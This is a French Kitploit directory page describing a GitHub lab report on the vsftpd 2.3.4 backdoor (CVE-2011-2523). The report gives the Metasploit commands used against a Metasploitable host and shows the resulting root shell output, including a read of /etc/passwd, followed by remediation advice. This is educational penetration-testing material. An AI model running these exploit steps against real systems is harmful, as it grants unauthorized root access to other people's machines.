Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/vedpakhare/vsftpd-234-vuln-report
Frameworks d'ExploitationAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubvedpakhare/vsftpd-234-vuln-report

vsftpd-234-vuln-report

Évaluation de la vulnérabilité et exploitation de vsftpd 2.3.4 (CVE-2011-2523) en utilisant Metasploit. Rapport complet et preuve d'accès root inclus.

Voir le dépôtSite web
21il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

💥 Rapport d'exploitation de la backdoor vsftpd 2.3.4

Exploitation d'une vulnérabilité connue dans vsftpd 2.3.4 en utilisant Metasploit.

📌 Détails de la cible

  • IP cible : 192.168.150.133
  • Service : FTP
  • Version vulnérable : vsftpd 2.3.4
  • Module d'exploitation : exploit/unix/ftp/vsftpd_234_backdoor
  • Charge utile : Shell de commande (TCP)

🔍 Résumé de la vulnérabilité

vsftpd 2.3.4 contient une backdoor malveillante qui ouvre un shell de commande sur le port 6200 lorsqu'un nom d'utilisateur spécialement conçu (se terminant par :)) est reçu.

CVE : CVE-2011-2523


🚀 Étapes de l'exploitation

root@kitploit:~
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.150.133
run

💥 Accès au shell obtenu :

root@kitploit:~
whoami
> root

id
> uid=0(root) gid=0(root)

hostname
> metasploitable

uname -a
> Linux metasploitable 2.6.24-16-server #1 SMP ...

cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  ...

🔐 Impact

L'accès au shell root donne à l'attaquant un contrôle total sur le système cible — y compris l'élévation de privilèges, le déplacement latéral, l'exfiltration de données et l'accès persistant.


✅ Recommandation

  • N'utilisez PAS vsftpd 2.3.4.
  • Mettez à niveau vers une version sécurisée et prise en charge.
  • Restreignez l'accès externe au FTP.
  • Surveillez le trafic suspect sur le port 6200.

📄 Rapport

📝 Rapport PDF complet disponible dans ce dépôt : vsftpd-exploit-report.pdf


📚 Références

  • Rapid7 Module Info
  • CVE-2011-2523 - NVD

👨‍💻 Auteur

Fait avec 🔥 par vedpakhare

Télécharger l’outil